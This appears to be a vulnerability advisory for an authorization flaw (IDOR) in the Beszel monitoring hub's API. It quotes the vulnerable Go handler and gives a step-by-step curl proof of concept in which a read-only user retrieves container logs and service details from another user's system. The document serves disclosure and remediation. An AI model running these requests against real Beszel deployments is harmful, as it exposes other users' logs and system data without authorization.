Lack of data validation In github.com/henrygd/beszel

Description

Beszel has an IDOR in hub API endpoints that read system ID from URL parameter

Summary

Some API endpoints in the Beszel hub accept a user-supplied system ID and proceed without further checks that the user should have access to that system. As a result, any authenticated user can access these routes for any system if they know the system's ID.

System IDs are random 15 character alphanumeric strings, and are not exposed to all users. However, it is theoretically possible for an authenticated user to enumerate a valid system ID via web API. To use the containers endpoints, the user would also need to enumerate a container ID, which is 12 digit hexadecimal string.

Affected Component

    File: internal/hub/api.go, lines 283–361

    Endpoints:

      GET /api/beszel/containers/logs?system=SYSTEM_ID&container=CONTAINER_ID

      GET /api/beszel/containers/info?system=SYSTEM_ID&container=CONTAINER_ID

      GET /api/beszel/systemd/info?system=SYSTEM_ID&service=SERVICE_NAME

      POST /api/beszel/smart/refresh?system=SYSTEM_ID

    Commit: c7261b56f1bfb9ae57ef0856a0052cabb2fd3b84

Vulnerable Code

The containerRequestHandler function retrieves a system by ID but never verifies the authenticated user is a member of that system:

// internal/hub/api.go:283-305
func (h *Hub) containerRequestHandler(e *core.RequestEvent, fetchFunc func(*systems.System, string) (string, error), responseKey string) error {
    systemID := e.Request.URL.Query().Get("system")
    containerID := e.Request.URL.Query().Get("container")

    if systemID == "" || containerID == "" {
        return e.JSON(http.StatusBadRequest, map[string]string{"error": "system and container parameters are required"})
    }...

The same pattern applies to getSystemdInfo (lines 322–340) and refreshSmartData (lines 342–361).

Meanwhile, the standard PocketBase collection API enforces proper membership checks:

// internal/hub/collections.go:56-57
systemsMemberRule := authenticatedRule + " && users.id ?= @request.auth.id"
systemMemberRule  := authenticatedRule + " && system.users.id ?= @request.auth.id"

These rules are only applied to the PocketBase collection endpoints, not to the custom routes registered on apiAuth.

PoC

The proof: The standard PocketBase API returns 404 (system not found) for unassigned systems. The custom endpoints resolve the system, contact the agent, and return data — proving the authorization check is missing.

Step 1: Start the hub

cd ~/Evidence/henrygd/beszel/finding418/docker-poc/
docker compose up -d

Wait a few seconds, then verify:

curl -s http://localhost:8090/api/health

Expected: {"message":"API is healthy.","code":200,"data":{}}

Step 2: Create User A (admin)

Open http://localhost:8090 in a browser and create the first user:

Step 3: Create User B (readonly)

In the Beszel UI, go to Users and add a new user:

Step 4: Authenticate as User A

TOKEN_A=$(curl -s http://localhost:8090/api/collections/users/auth-with-password \
  -H "Content-Type: application/json" \
  -d '{"identity":"[email protected]","password":"testpassword1"}' \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['token'])")

echo "TOKEN_A=$TOKEN_A"

Step 5: Get hub public key

HUB_KEY=$(curl -s http://localhost:8090/api/beszel/getkey \
  -H "Authorization: $TOKEN_A" \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['key'])")

echo "HUB_KEY=$HUB_KEY"

Step 6: Create a universal token and start the agent

UTOK_A=$(curl -s "http://localhost:8090/api/beszel/universal-token?enable=1" \
  -H "Authorization: $TOKEN_A" \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['token'])")

echo "UTOK_A=$UTOK_A"

Find the Docker network the hub is on:

NETWORK=$(docker inspect beszel-hub --format '{{range $k,$v := .NetworkSettings.Networks}}{{$k}}{{end}}')
echo "Network: $NETWORK"

Start the agent on the same network so the hub can reach it:

docker run -d --name beszel-agent-a \
  --network "$NETWORK" \
  -e HUB_URL=http://beszel-hub:8090 \
  -e TOKEN="$UTOK_A" \
  -e KEY="$HUB_KEY" \
  henrygd/beszel-agent:latest

Wait a few seconds for the agent to register:

sleep 5

Step 7: Verify User A sees the system

curl -s http://localhost:8090/api/collections/systems/records \
  -H "Authorization: $TOKEN_A" | python3 -m json.tool

You should see one system in items. Save the system ID:

SYSTEM_A_ID=$(curl -s http://localhost:8090/api/collections/systems/records \
  -H "Authorization: $TOKEN_A" \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['items'][0]['id'])")

echo "SYSTEM_A_ID=$SYSTEM_A_ID"

Step 8: Authenticate as User B (readonly)

TOKEN_B=$(curl -s http://localhost:8090/api/collections/users/auth-with-password \
  -H "Content-Type: application/json" \
  -d '{"identity":"[email protected]","password":"testpassword2"}' \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['token'])")

echo "TOKEN_B=$TOKEN_B"

Verify User B sees NO systems:

curl -s http://localhost:8090/api/collections/systems/records \
  -H "Authorization: $TOKEN_B" | python3 -m json.tool

Expected: "totalItems": 0

Step 9: Control test — standard API blocks User B

echo "=== Standard PocketBase API ==="
curl -s -w "\nHTTP Status: %{http_code}\n" \
  "http://localhost:8090/api/collections/systems/records/$SYSTEM_A_ID" \
  -H "Authorization: $TOKEN_B"

Expected: 404 — RBAC correctly hides the system from User B.

Step 10: IDOR — SMART refresh (User B triggers action on User A's system)

echo "=== IDOR: POST /api/beszel/smart/refresh ==="
curl -s "http://localhost:8090/api/beszel/smart/refresh?system=$SYSTEM_A_ID" \
  -X POST -H "Authorization: $TOKEN_B" | python3 -m json.tool

Expected: The hub processes the request and contacts the agent. Any response (data or agent error) proves the IDOR — compare with the 404 from Step 9.

Step 11: IDOR — Systemd info (User B reads from User A's system)

echo "=== IDOR: GET /api/beszel/systemd/info ==="
curl -s "http://localhost:8090/api/beszel/systemd/info?system=$SYSTEM_A_ID&service=sshd" \
  -H "Authorization: $TOKEN_B" | python3 -m json.tool

Expected: Hub contacts the agent and returns systemd data or an agent-level error.

Step 12: IDOR — Container logs (User B reads from User A's system)

Container endpoints require a Docker container ID (12-64 hex chars). Get a real one from the agent's host:

# Get a real container ID from Docker (first 12 hex chars)
CONTAINER_ID=$(docker ps --format '{{.ID}}' | head -1)
echo "CONTAINER_ID=$CONTAINER_ID"

echo "=== IDOR: GET /api/beszel/containers/logs ==="
curl -s "http://localhost:8090/api/beszel/containers/logs?system=$SYSTEM_A_ID&container=$CONTAINER_ID" \
  -H "Authorization: $TOKEN_B" | python3 -m json.tool

Step 13: IDOR — Container info (User B reads from User A's system)

echo "=== IDOR: GET /api/beszel/containers/info ==="
curl -s "http://localhost:8090/api/beszel/containers/info?system=$SYSTEM_A_ID&container=$CONTAINER_ID" \
  -H "Authorization: $TOKEN_B" | python3 -m json.tool

Impact

    Container logs: Content of recent application logs, potentially including sensitive information

    Container info: Content of Docker engine API's /containers/{id}/json endpoint, excluding environment variables

    Systemd info: Unit properties and status for any monitored service

    SMART refresh: Trigger a SMART data update on any system

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version
Patched versions